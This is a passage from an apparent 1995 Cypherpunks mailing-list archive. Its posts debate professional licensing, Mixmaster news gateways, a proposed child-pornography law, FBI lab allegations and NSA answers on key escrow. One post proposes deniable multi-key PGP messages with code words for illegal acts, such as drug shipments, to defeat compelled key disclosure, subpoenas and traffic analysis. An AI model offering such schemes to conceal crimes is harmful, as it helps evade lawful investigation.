law, medicine, or many other professions in any state. The nets weaken > these restrictions because they allow action at a distance. But I believe there will still be a demand for an objective, or trusted authority in the market. This was my point when I asserted that certificated from Bob and Alice that I was a decent attorney would not be sufficent for most unless Bob and Alice were trusted in the "attorney credential" area. So in the end, isn't a trusted authority required to some degree? I think the difference here, as opposed to the Web of Trust in e.g., PGP, is that you are talking about legal talent, or any professional talent, for which payment is being made. It's easy to accept a signature from Mr. Mar indicating that Bob has (in Mr. Mar's opinion) decent key management habits, but it's asking a great deal to extend that trust in Mr. Mar to his opinion of Bob's legal skills. For that there will be a demand of more detailed and certain expertise in Mr. Mar, and also a trust that Mr. Mar is not just helping an upstart friend of his make some money in consulting for nuclear physics projects. i.e. it is very difficult to estlablish the objectivity of a certifier without some kind of public and significant risk on the part of the certifier coupled with some verifiable skill in appraising nuclear physics skill- a situation I would argue is almost impossible without a certificate from an institution which meets some base credentials, which are set up publically by a objective process, or nearly so. > Note the other effects of the nets. They make it hard to tell that you > *are* working which reduces the impact of regulations of work by > "illegal aliens." Thus if I am wandering through the South of France > while writing the 'Great American Novel' I am unlikely to get busted for > violation of work restrictions. The nets expand the number of jobs I > can do while innocently wandering the South of France. I can or will > soon be able, for example, to manage a large international corporation > from anywhere. This I understand and applaud. > DCF > > "Who actually prefers Le Massif Central to those hot and crowded southern > climes." > From pfarrell at netcom.com Thu Sep 14 04:39:39 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 14 Sep 95 04:39:39 PDT Subject: DD, pedaphiles, and Terrorists, oh my Message-ID: <27512.pfarrell@netcom.com> Today's Washington Post (9/14) has a front page article on a bust of 12 computer using pedaphiles. NBC news is saying that Janet Reno will have a news conference later this morning. Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards will be held. Coincidence? Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From dsc at swcp.com Thu Sep 14 04:57:54 1995 From: dsc at swcp.com (Dar Scott) Date: Thu, 14 Sep 95 04:57:54 PDT Subject: cryptography eliminates lawyers? Message-ID: Black Unicorn wrote, [snip] >> We seem to be having problems with the meanings of words. For example, I >> make a distinction between certification and licensing. > >Which, as I have indicated, I see as a "distinction without a difference." We're at a standoff here. [snip] >So you wouldn't consider the Hollywood blacklist coercive? >What about revocation of tax free status? Not as you describe it. No. [snip] > >> And I see a >> big difference in a market based monopoly and a government based monopoly. >> > >Which, I think, is your key error- particularly in the context of this >licensing issue, where the difference is nearly invisible. This is our standoff. [snip >I think your hangup is one of overdemonizing the state to the point where >no other evils seem to exist. Actually, I think that much coercion (as I used it) is outside the state. I also believe there is much evil outside of coercion but that is probably outside the scope of the topic. I do admit that I am emphasizing coercion and using that as the dividing line more than other types of evil. [snip] > Though one might >> think of physical force as applying to murder, kidnapping, slavery, >> assault, robbery, physical theft, I would also apply it to theft or damage >> of abstract property that has properties like physical property. I intend >> for these to apply to many actions of the state. > >I think you have failed to apply them to other organizations. Again, I >think you are over amoured with hating "the state." Many organizations >not affiliated with government do violence to abstract properties. I refered to the physical force used by gangs to enforce neighborhood rules. After pondering this, I think this does not apply to my approach. The state is brought up because it is the agent of coercion in licensing. [snip] >If I am a producer in a horizontal territory limitation agreement for >sales of wigets, and bob is not, bob's attempt to move into my area and >sell widgets will be met with a boycott by all the members of my >agreement. Is this any less coercion? I understand the violence is >fairly dramatic coercion, but it is hardly the only coercion. Do you not >consider the Clipper program coercion? The first is not. The Clipper program (as I understand it) is. Remember, my guideline is simple threat of physical harm. >I suggest you take a look at Nozick, Coercion, in Philisophy, Science and >Method (S. Morgenbessed ed. 1969) or Zimmerman, Coervice Wage Offers, 10 >Phil & Pub. Aff. 121 (1981) Also, see Kreimer, Allocational Sanctions: >The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev. >1293 (1984). I'll look for Nozick. [snip] >> >I guess the center of my question is, how can you apply Web of Trust to >> >e.g. a university degree. Who cares what Bob and Alice think my degree >> >is in, the client only wants to know from the institution. >> >> It does not matter why people would trust a certifying entity. It might >> have a great earned reputation, it might "borrow" some reputation from >> bonding or audits, or it might have ties to the Real World. > >Exactly, it must be tied to some kind of authority. In this case, the >issuing institution is about the only acceptable one. > >I stand by the contention that a University degree cannot be certified >acceptably by an authority not in some way connected to the University. I think such a certification is consistent with my desire for alack of physical coercion in this. I assume you'd be willing to let the market prove this point. [snip] >You are using coercion in a different sense. One of the definitions I >get in Webster's (while force is incorporated in some others) is "to >compel to do something by the use of power, intimidation or threats." > >If you perfer that I use "serious persuasion" instead, fine, but I think >you are just splitting hairs. I think there is a big difference between "I'm going to break your house windows unless you give me $50" and "I'm going to stop delivering milk unless you pay your $50 milk bill". [snip] >Do you believe it impossible/insignificant to manipulate behavior by >persuasive means other than violence or the threat of actual physical >violence? No. And for me there are cases when it would be wrong. I won't comment on when it is wrong for others, but in the alternate case that includes violence or the threat, I will say it is wrong. >> >Can't the multiple authorities set common >> >or near common guidelines? Rather, don't they HAVE to in order to have >> >their signatures worth the electrons they are transmitted with? >> >> In general, No. Under many conditions market forces make services alike, >> but more often competing businesses find particular market niches. > >An example please? With specific regard to certifing authorities and >university degrees? A BA and BS have become practically the same, but a BSET (tech) is very different from a BSEE (engineer). [snip] >I still am having trouble understanding your definition of coercion. [snip] >> I see a big difference in withholding a signature and sending gunmen. >> There is no violence in withholding a signature. > >There is no PHYSICAL violence, this I have admitted, but the economic >violence of such an act can be significant. It seems that for you the >distinction is in the emotional effect of the application of persuasive >force, rather than the effect. Oh. You are right in the last part. The distinction is NOT the effect. Not the emotional effect either. It is the ethics and pragmatics of relying of a competition of ideas and not force. To put it bluntly, coercion (as I defined it: murder, theft, ...and the threat thereof) a sin. [snip] >Allowing emotion to cloud one's judgement of what is and is no coercive >is a mistake. Agreed. I have clear guidelines. >I believe that your defining the words merely to distinguish who the >certifing authority is confusing- and deceptive. The concepts of coercive methods and noncoercive methods are there regardless of the words. I prefer agents of the first over agents of the latter. [snip] >[market monopolies are "softer" than government ones.] [Agreed.] [snip] >The base requirement of a certification from an education institution >(for which you have provided no substitute). Let the market decide if there really is one. >The existance of a floor, below which it is impractical to practice a >profession and the existance of a set of entities (of whatever number) >who's signatures are required to transcend this floor. Let the market decide. [snip] >> Perhaps, I could have use the phrases "non-coercion-based" licensing and >> "coercion-based" licensing, but I am not comfortable with these--trade >> licensing invokes too violent of an image. > >I think this construction is still flawed. I will remain by my position >that licensing is useful when not used to collect taxes or >otherwise overregulate. I also hold that the distinctions you make >between licensing and certification are without functional difference in >effect and are deceptive in that they suggest a significant difference in >effect or purpose where there is none. > The difference in effect is in emergent market optimization. The difference in purpose is ethical. I have learned that you--and perhaps others--do not see an important difference in these two styles of influencing behavior. I see a major difference and in thinking the difference was obvious was slow in understanding your position. Great. You're already enjoying breakfast and I still have to go to bed. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From jya at pipeline.com Thu Sep 14 05:23:52 1995 From: jya at pipeline.com (John Young) Date: Thu, 14 Sep 95 05:23:52 PDT Subject: WAS_tem Message-ID: <199509141223.IAA08242@pipe4.nyc.pipeline.com> 9-14-95. NYPaper. "Use of Computer Network For Child Sex Sets Off Raids." The Justice Department today announced a dozen arrests in a two year investigation into the use of America Online, the country's largest computer network, to distribute child pornography and to lure minors into sex. The culmination of the inquiry by the Federal Bureau of Investigation comes at a time when the agency has needed some favorable attention to offset a string of incidents that have cast it in a negative light. "Scientologists Lose a Battle on the Internet." Upholding free speech on the Internet, a Federal judge has ordered the Church of Scientology to return computers and files seized here last month from two men who used a computer bulletin board to disseminate information critical of the church. The equipment belongs to Factnet, an anti-Scientology bulletin board run by two Boulder men, Lawrence Wollersheim and Robert Penny. 2x: WAS_tem (16 kb) From jpb at miamisci.org Thu Sep 14 05:36:40 1995 From: jpb at miamisci.org (Joe Block) Date: Thu, 14 Sep 95 05:36:40 PDT Subject: Scientology tries to break PGP - and Message-ID: -----BEGIN PGP SIGNED MESSAGE----- re: >[snip] >> When the safety is finally removed from the gun at your head (sorry for >> the drama) you hand over your alternate secret key. If decrypted with the >> "alternate" or "fake" secret key, the encrypted file is wiped until it >> reaches a marker; the remainder of the file is displayed. If you use your >> "primary" or "real key", the extraneous text is simply stripped. Instead of stripping, how about adding an offset to the start and end of the ciphertext to each encoded idea key. This way, I can send text A to key A, text B to key B, C to C and so on. As long as the recipient and I have agreed in advance on which key to use to exchange the real message, who can say otherwise? If code words are used in all the messages to refer to any illegal acts, ("ship me 30 kilos of smack" might be a tad incriminating) how can anything be proved even if the recipient is compelled to divulge their key? An added advantage to this scheme is that if properly used it should help throw a monkey wrench into traffic analysis by the nosy. If I regularly exchange encrypted messages with several different recipients, I can enclose a seperate plaintext for each, make one massive combined cyphertext and send it to all of them. The ones I have no instructions or trade secrets for today will each receive "Ignore this message," followed by a randomly selected random number of fortunes or other random data (so each message to be ignored will have different length different plaintext to further thwart analysis). This may be combined with stealth PGP headers to make it difficult for LEAs to determine all recipients for the purpose of getting a subpeona for their keys. Joseph Block "We can't be so fixated on our desire to preserve the rights of ordinary Americans ..." -- Bill Clinton (USA TODAY, 11 March 1993, page 2A) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFek8mGnwFiC3O2NAQGx0QgArERNVabtUY3MMDaDfjFn+Jg4ZGQcV4oD 47qJDFqW4riQ6LtQW3YiptkVl/jGJcwzEyRTAb4v6mYeIXwaQi4Or0C041ADLGMo RzB/tIIQSsF+oQYEI/lHL1t8jYi4737oU2BJrUJvgahsNS0V7TBTEtGhdDWFDjk9 bd74f//lJCmnvq/gqV02KqB0zL1YGAXoXLzzhZEMk3T2cxm9n5oRZX82zT4tCV0Q Cw1jW7ZT+Bsaa099RJ7HvLQI4fqMeI7+NoBwhhtpZ/Iy8OWmEhaOz4Z50cZcbxf1 Ol6xMKXdHBVqK41cm7lyoH7Tpt7Zw1bSq4svONm6v2urwn9R9JHn+Q== =8BlI -----END PGP SIGNATURE----- From dcl at panix.com Thu Sep 14 07:28:31 1995 From: dcl at panix.com (David C. Lambert) Date: Thu, 14 Sep 95 07:28:31 PDT Subject: Crimestoppers anon tip mailbox Message-ID: <199509141428.KAA10931@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Frank Stuart writes: > Now that you mention it, it seems to me that completely anonymous tipsters > with the ability to receive ecash rewards would likely be a bigger boon to > law enforcement types than would easily tappable communications lines. > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for > use through the remailers)? I might be. > You could set up a web-page with instructions > and a list of crimes for which there are rewards. Perhaps some civic > organizations would be willing to donate money for tips leading to arrests > and convictions of any crimes. Excellent idea. Then it could be brought to the attention of a candidate or two that have net.crime on their agendas. > Even if it doesn't catch any bad guys, it'd be > great PR for strong crypto, anonymity, ecash and whoever runs it. ^^^^^^^^^^^^^^^ Well, I don't know about the last part - it seems to me that opinions would be mixed. The only thing that I'm not sure of is the use of ecash - mostly because I haven't really been keeping track of the state of the art. Could some people who are better informed on the subject discuss whether this is a feasible way to use it? I wasn't actually thinking of rewards, mostly because you'd have to arrange some sort of reply block from the anonymous tip mailbox. Most people (even remailer users) don't know how or don't wish to use these, so I don't know if that part would really fly. David C. Lambert dcl at panix.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFg8D6pplsfgM88VAQG6lQP+OpKrDF73T8zupGfco0VREUa98wLYR7VX Jw2OyUHYML28VQNxwikZNTwBObotEihVo6uH9xRKzhBnpzqol1D/ZAj+1z24x2EK byqhSp4PJEiKmzqW0chWCeIhX6ND45E2vSweBB6/OPotlZw9C7ZfnM+i0cfII3gb Np+Dec/mLHU= =M+KT -----END PGP SIGNATURE----- From rsalz at nntp.com Thu Sep 14 07:31:06 1995 From: rsalz at nntp.com (Rich Salz) Date: Thu, 14 Sep 95 07:31:06 PDT Subject: Mixmaster posting poll Message-ID: <199509141429.KAA23068@nntp.com> > I think that I am not being clear enough about what I want to do. Ah, now I understand -- thanks for the clarification. Let me waste a bit of time on some general news/mail issues. The two formats are very similar, but not identical. This is generally a good thing. For example, it's easy to write a single user interface that handles both. (Many people like having killfiles on their email, for example.) However, when you start to gateway between the two, the differences become more important. For example, suppose an article has To, Newsgroups, and Cc headers. What should happen? Some news user-agents (used to?) email as well as post when given a news article with those headers. And what happens when an article is then gatewayed back out to email, and care isn't taken to strip those headers off? (Rhetorical question; I don't know.) I think this is of particular concern to this community. Imagine a mail->news remailer that gatewayed messages by connection to UUNET's accept-from-anyone server and posted them to alt.blacknet. Interested parties might then get a full feed and locally gateway alt.blacknet into a mailing list. So this kind of multi-time gatewaying, if not common now, could (and should?) be soon. I guess that's a long way of saying "be careful." :) The advantage of using "news.group at gateway.host" is that it might avoid these confusions since the Newsgroup header appears out-of-band. However setting up gateways like this is often harder, requiring special prefixes (viz., usenet.news.group at gate.host is/was common) hundreds (thousands) of aliases, or the ability to set up special mailer config (typically sendmail.cf on the internet these days) that recognize only the top-level hierarchies (of which there are hundreds, changing weekly). There is also the problem of making sure that the mail newsgroup list is kept in sync with the local host's newsgroup list. An even bigger problem is that cross-postings are essentially impossible (you get multiple copies); this can be annoying if you want to cross-post to a group that the gateway host doesn't receive. A workable trick is to post to control,alt.blacknet -- everyone "gets" control but only those that care will see the article where it should really go. If you use something like mail2news at gate.host, then the newsgroups are in the Newsgroups header. You have to be careful about To and Cc but you don't have the problems mentioned above. I think the header problem is more likely fixed/fixable, and therefore suggest the second syntax. If you do local gatewaying, you should really send your article into rnews and not inews. Inews will mess with headers, which is okay for users or scripts that know they can be sloppy. But not okay for gateways which don't want .signature files appended, too-much-quoted-text counted, etc. Feeding into rnews is not difficult -- you need merely ensure that your message has these six headers: Message-ID Newsgroups From Date Subject Path. The other advantage of feeding into rnews is that rnews always spools if the news processor is unavailable, while inews doesn't. Another option is to provide a program that can connect to a specified host and inject the gatewayed article directly using the NNTP protocol. This is not hard; INN includes a program (feedone.c) that does it in about 200 commented source lines. INN is available from many places, including ftp://ftp.uu.net/networking/news/nntp/inn/inn1.4sec2.tar.Z and my news/mail gateway software (newsgate) is available by sending me email. Hope this helps. /r$ > > At 8:35 AM 9/13/95, Rich Salz wrote: > >> If the form alt.usenet.group at remailer.com was used, wouldn't the > >> system running the remailer have to have an alias defined for each and > >> every newsgroup that it plans on handling? > > > >No. Sites running sendmail, for example, could set up rules that > >just knew the top-level hierarchies and fed those into a special > >"mailer" that gatewayed them. > > > >My opinion is that making any names well-known is a bad idea, and > >that attaching special semantics to "mail2news at xxx" is a real bad > >idea. Instead, just send the message to the specified recipient > >and let do whatever magic needs to be done. > > > >If mixmaster wants to function as a mail/news gateway, it should > >do something special when it sees the Newsgroups header -- process > >the message and feed it into rnews, presumably. > > > >I guess, but not yet having read the code do not know, that this is > >cleaner and more easily extensible (or removable). > > /r$ > > ---------------------------------------------------------- > Lance Cottrell loki at obscura.com > PGP 2.6 key available by finger or server. > Mixmaster, the next generation remailer, is now available! > http://obscura.com/~loki/Welcome.html or FTP to obscura.com > > "Love is a snowmobile racing across the tundra. Suddenly > it flips over, pinning you underneath. At night the ice > weasels come." > --Nietzsche > ---------------------------------------------------------- > > > From samman-ben at CS.YALE.EDU Thu Sep 14 07:41:14 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Thu, 14 Sep 95 07:41:14 PDT Subject: WAS_tem In-Reply-To: <199509141313.JAA12828@pipe4.nyc.pipeline.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > The New York Times, September 14, 1995, pp. A1, B14. > > Use of Computer Network For Child Sex Sets Off Raids [snip] > Lawmakers have debated whether to restrict the use of > computer networks. Today, a bill making it illegal to use > computers to produce child pornography was introduced by > Senator Orrin G. Hatch, the Utah Republican who heads the > Judiciary Committee. > > The bill would expand the definition of child pornography > to include any photograph, film, videotape or computer > image produced by any means, including electronically by > computer, if it depicts or appears to depict a minor > engaging in sexually explicit conduct. If I'm reading this correctly, if I Photoshop a kids face onto the body of the latest Playboy centerfold, I'm in violation of this proposed law? Ben ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf PGP encrypted mail welcomed--finger samman at cs.yale.edu for public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMFg+8L5ALmeTVXAJAQEJswL+KijGeD+NIxOEdGkusWl/l8kLpigd73r1 JxoOeo1Sv9jc8JEv89SQDt2xY5i9WhquARph/+N2d7m2FR1DvRnLlHtuvjsV7hjS mOwurpzx6wHfmJnivojJUqwfTrqxT5gG =bUJU -----END PGP SIGNATURE----- From trollins at hns.com Thu Sep 14 07:48:21 1995 From: trollins at hns.com (Tom Rollins) Date: Thu, 14 Sep 95 07:48:21 PDT Subject: Scientology tries to break PGP - and Message-ID: <9509141448.AA18318@dcn92.hns.com> This area of court ordered key disclosure is troubling. I assume that failure to do so would be punished by "contempt of court" much like a reporter that refuses to reveal his information sources. (Jail or Fine until the person complies with the order). If you have PGP encrypted messages on your disk which are encrypted to other people. Is this a libality ? Normally, you have no way to decrypt this data. After looking at a PGP 'Hack' which allows the message to be encrypted with a session key different from the session key encrypted in the RSA header using someones public key. Your data could thus be encrypted in a PGP message to someone without using the session key specified in that RSA header. This someone else may or may not exist. You may have created a key pair and discarded the secret key. It would then seem that you could be found in "Contempt of Court" because you could not come forward with a private key belonging to someone other than yourself. -tom From mark at unicorn.com Thu Sep 14 07:51:56 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 14 Sep 95 07:51:56 PDT Subject: An opportunity not to be missed Message-ID: On Thu, 14 Sep 1995, Frank Stuart wrote: > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for > use through the remailers)? You could set up a web-page with instructions > and a list of crimes for which there are rewards. Someone already tried that. The cops got a copy of the WWW logs and started investigating everyone who'd looked at the WWW page... So at the least you'd need a bunch of anonymous WWW proxies as well. There's also the problem that the current ecash systems do not provide payee anonymity, so if you pay informers with ecash they can be traced if the bank and payer collude. Mark From robl at on-ramp.ior.com Thu Sep 14 07:56:40 1995 From: robl at on-ramp.ior.com (Rob L) Date: Thu, 14 Sep 95 07:56:40 PDT Subject: DD, pedaphiles, and Terrorists, oh my In-Reply-To: <27512.pfarrell@netcom.com> Message-ID: On Thu, 14 Sep 1995, Pat Farrell wrote: > Today's Washington Post (9/14) has a front page article on a bust of > 12 computer using pedaphiles. > NBC news is saying that Janet Reno will have a news conference > later this morning. > Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards > will be held. > Coincidence? I think not.. Kind of like the coincidence that just before any gun law votes, some maniac goes on a shooting spree.. ;) I would be interested to hear what Reno has to say.. if someone is in a position to hear/see it, and can drop the key parts here, I would appreciate it. 'Course, I would rather have pedophiles using computers than stalking parks.. Thanks- RobL From patrick at Verity.COM Thu Sep 14 08:11:08 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 14 Sep 95 08:11:08 PDT Subject: Digital Fingerprinting Message-ID: <9509141507.AA21086@cantina.verity.com> > From: Mac Norton > To: Patrick Horgan > > On Wed, 13 Sep 1995, Patrick Horgan wrote: > > > > > > > > Then, in W.Ky., as in Stockbridge, "You can get > > > > anything you want..."? :) > > > > > > I'd stick with: > > > *********************************************** > > > You can't always get what you want 1 > > > but if you try > > > sometimes, sometimes you get what you need. 2 > > > *********************************************** > > > > > > 1 ability to dump garbage where you want > > > 2 a better appreciation for the environment > > > :-) > > > > > > Why do I feel like I'm sitting on the group W bench? > > I don't know, kid, what you in for? > Encryption. And they all moved away from me on the group W bench there, talking mean hairy eyeballs and all sorts of things until I said, and annoying the NSA, and they all moved back, talking about crime, PEM, PGP, and liberty and justice for all;) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From anonymous at freezone.remailer Thu Sep 14 08:19:50 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Thu, 14 Sep 95 08:19:50 PDT Subject: Feeb Slants Feeb Slur Message-ID: <199509141519.LAA11102@light.lightlink.com> FBI Probes Slant Allegations Washington, September 14, 1995 (AP) -- The FBI says it has reviewed more than 250 cases involving work done by its crime lab after one of its agents alleged that his colleagues slanted their testimony and fabricated evidence to help prosecutors in high-profile cases. "To date, no evidence tampering, evidence fabrication or failure to report exculpatory evidence have been found," the FBI said in a statement Wednesday. "Any findings of such misconduct will result in tough and swift action by the FBI." Special Agent Frederic Whitehurst, who made the allegations and was interviewed Wednesday night on ABC-TV's "Primetime Live" program, labeled the FBI statement "garbage." "I am obviously disagreeing with my superiors in this matter. This report is garbage. ... It's garbage. I personally know about the review of those 250 cases," Whitehurst said. Whitehurst said he was under orders not to discuss specific cases. Defense lawyers want to call Whitehurst as a witness at the O.J. Simpson murder trial in Los Angeles because he has claimed that FBI agent Roger Martz, who gave testimony damaging to Simpson, has slanted evidence in testimony in other cases. Asked if there had been evidence tampering at the FBI lab, Whitehurst told ABC, "Yes, I believe there has been evidence tampering." He said he would testify at the Simpson trial "if the FBI orders me to go." Martz could not be reached for comment. There was no answer at the office phones either Martz or Whitehurst late Wednesday. Their home phone numbers could not be be found. The FBI said Whitehurst had, over the past several years, raised "a variety of concerns about forensic protocols and procedures employed in the FBI Laboratory," and that the bureau or the inspector general's office of the Justice Department, or both, had "vigorously investigated" his concerns in all instances and were continuing to do so. The FBI said its laboratory examinations at trials are "constantly subject to extraordinarily vigorous challenge through cross-examination and the presentation of expert testimony by defense witnesses." Whitehurst told ABC he was speaking out because it was his duty as an FBI agent. "I swore to uphold the constitution of the United States, and I swore to enforce the law. There was no caveat in that swearing -- if I caught persons with badges I would turn my back. I am an FBI agent. It's my duty," he said. Whitehurst testified last month at the terrorism trial of Sheik Omar Abdel-Rahman and nine other Muslims accused of plotting to bomb the United Nations building and other New York City landmarks that he was pressured to distort findings about the 1993 World Trade Center bombing to favor prosecutors. Citing a series of internal memos sent by Whitehurst to his FBI supervisors, ABC said the agent listed "one example after another of what he calls perjury, fraud, even the fabrication of evidence" in cases at the crime lab going back at least five years. One of the cases, ABC said, involved a 1991 Georgia mail-bombing that killed a federal judge and a civil rights lawyer. It was investigated by Louis Freeh, now the FBI director. Walter LeRoy Moody Jr. was convicted in the deaths. ABC said Whitehurst alleges that two agents in that case, one of whom was Martz, slanted evidence by testifying about tests that weren't done and scientific conclusions they couldn't support. The FBI lab was used to analyze blood evidence involving Simpson. Martz, a toxicologist, was called by the defense, but was declared a hostile witness. He testified that blood on a sock from Simpson's bedroom and from the crime scene showed only vague signs of a preservative. Simpson's lawyers say the blood was planted and the presence of the preservative proved it. While testifying in New York Aug. 14, Whitehurst said Martz was among several FBI investigators who concluded the World Trade Center bomb was urea-nitrate-based even though it was impossible to prove that scientifically because the substance is so common. After Whitehurst complained to his superiors, he said, reports about the bomb were corrected. He said they were accurate when they were introduced at last year's World Trade Center trial, which resulted in convictions for followers of Abdel-Rahman. At the terror conspiracy trial, Whitehurst said when he first told his supervisor about the errors, the supervisor "advised us that he would now have to embarrass his chemistry toxicology unit chief and that we were never, ever again to do something like that to him." Later, Whitehurst said, the supervisor told him he had been instructed by his bosses to have Whitehurst change his reports, and debates within the FBI about the evidence continued throughout the year. Whitehurst, the FBI's main explosives-residue analyst at the time of the bombing, said he has since been demoted and assigned to analyze paint for forensic evidence. ----- From jamesd at echeque.com Thu Sep 14 08:25:06 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 14 Sep 95 08:25:06 PDT Subject: WAS_tem Message-ID: <199509141524.IAA00532@blob.best.net> >> The bill would expand the definition of child pornography >> to include any [...] >> image produced by any means, including electronically by >> computer, if it depicts or appears to depict a minor >> engaging in sexually explicit conduct. At 10:40 AM 9/14/95 -0400, Rev. Ben wrote: >If I'm reading this correctly, if I Photoshop a kids face onto the body >of the latest Playboy centerfold, I'm in violation of this proposed law? If you draw a picture using paintbrush of an underage person engaging in sexual conduct, you are in violation of this proposed legislation. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From samman-ben at CS.YALE.EDU Thu Sep 14 08:28:24 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Thu, 14 Sep 95 08:28:24 PDT Subject: WAS_tem Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 14 Sep 1995, James A. Donald wrote: > If you draw a picture using paintbrush of an underage person engaging > in sexual conduct, you are in violation of this proposed legislation. Doesn't that directly contradict the stated purpose of existing child porn regulation? That is, doesn't current statute exist in order to prevent the exploitation of children, not to mandate morality? Do the lawyers on the list want to pipe up? Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMFhKCL5ALmeTVXAJAQG+eAMAstVn+sOOQkEI8ri6/jroSAwA8oCU5Fzu qRQfeOCnWJxqEeCE75orzaXIJFTIG3+qWdbKlsYNqS5MglPfI70Iw0Iw3VEtbHRB YZ595Aj6WXbBr3Z9SyR0mOCgN1twu2ds =+t1l -----END PGP SIGNATURE----- From patrick at Verity.COM Thu Sep 14 08:28:51 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 14 Sep 95 08:28:51 PDT Subject: NSA on GAK Message-ID: <9509141525.AA21098@cantina.verity.com> I've reformatted this to make it easier to read...If you've already read it, then just delete it:) ~~~~~~~ Included reformatted stuff starts here --\/ ~~~~~~~~~~~~~~~~~~~~~~ URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt ---------- Note: The following answers were provided by NSA to the Senate Subcommittee on Technology and the Law in response to their follow- up questions to the May 3, 1994 hearings. --------------------------- Senate Subcommittee on Technology and the Law Hearing on the Administration's Key Escrow Encryption Standard Written Questions for Vice Admiral McConnell, NSA *Questions for Senator Pressler: Q: Admiral, as you are aware, critics of the Administration's proposal argue that as a practical matter, no criminal, foreign spy, or terrorist of any sophisticated would be foolish enough to use an encryption device designed by the NSA and approved by the FBI. How do you respond? Why do[n't you] think the people whose telecommunications the NSA and the FBI want most to decode will be the very people most unlikely to use this technology? Answer: From what we know today, the overriding requirement that spies, terrorist, and criminals have is for readily available and easy to use equipment that interoperates. Key escrow encryption is not meant to be a tool to catch criminals. It will make excellent encryption available to legitimate businesses and private citizens without allowing criminals to use the telecommunications system to plan and commit crimes with impunity. We believe it would be irresponsible for government to make excellent encryption broadly available knowing that its use by criminals would make it impossible for law enforcement agencies to conduct lawful wiretaps against them. The Department of Justice credits information gleaned through wiretaps as leading to more than 20,000 felony convictions since the early 1980s. This would not have been possible if the criminals had been using encryption systems the FBI could not break. Without government action, however, this fortunate situation will change. At present most people, and most criminals, don't use encryption. However, there is an increasing public awareness of the value of encryption for protecting private personal and business communications. Increasing demand for encryption by the public will likely lead to the widespread use of some form of standardized encryption on the public telecommunications network. This development would have great benefits for the country. Legitimate businesses an private individuals could use the telecommunications system secure in the knowledge that their private information such as business records and credit card numbers could not be intercepted by third parties. But there is a down side. Criminals, terrorists, and others could also use the system to plan crimes, launder money, and the like, completely secure in the knowledge that law enforcement agencies could not listen to those communications. Just as legitimate businesses operate much more efficiently and effectively using the telecommunications system than they could without it, so will criminal enterprises be able to operate more efficiently and effectively if they no longer have to avoid using the telecommunications system. The United States is faced with a choice. We can sit back and watch as the emerging national information infrastructure becomes a valuable tool for criminals and terrorists to use to plan and carry out their activities with complete security, or we can take steps to maintain the current ability of government to conduct lawful wiretaps so that prudent criminals will have to find other less efficient ways to operate and foolish ones may be caught. Key escrow encryption is the later option. Q: Would widespread use of the Skipjack algorithm harm U.S. exports? Do you think it is unlikely foreign businesses will purchase American encryption technology if the U.S. Government holds a set of the decoding keys? Answer: I do not believe that widespread use of key escrow encryption in the United States will harm U.S. exports. If it has any effect at all, it could increase exports somewhat. Key escrow encryption products provide another option for foreign purchasers that they have not had in the past; to the extent that foreigners doe purchase key escrow encryption products, it will mean an increase in exports. Meanwhile, U.S. exporters are free to continue to sell the products they currently sell in foreign markets and to seek license approvals for new products. It is difficult to predict the foreign market for U.S. key escrow encryption technology. Businesses that fear U.S. Government interception of their communications presumably would avoid products for which the U.S. Government hold keys. However, there are a number of reasons why foreign businesses might purchase them. One major reason would be to communicate securely with U.S. businesses that use them. In addition, the superior level of security provided by key escrow products (against all but lawful U.S. Government access) may make them attractive to foreign business that do not view U.S Government access as a major concern. While some prospective users abroad may steer clear of key escrow products because the United States will retain access, there may be many who believe they are unlikely to be targeted by U.S. intelligence in any case or for whom the superior security offered by key escrow encryption products against threats of greater concern may make key escrow products an attractive option. For example, a distributor of pay-TV programming may depend on encryption to ensure that only those viewers who pay for the service can decrypt the TV signal. Such a distributor probably would not be concerned about the threat of access by the United States Government, and might favor suitable key escrow encryption products over competing products that use weaker encryption algorithms. Q: You were present when the previous panelist, Stephen Walker, described how present U.S. laws prohibit his company from exporting encryption products. As I understand it, Senator Murray's bill S.1846, attempts to relax these export controls somewhat. Please give us your views on this legislation. Answer: I support the Administration's 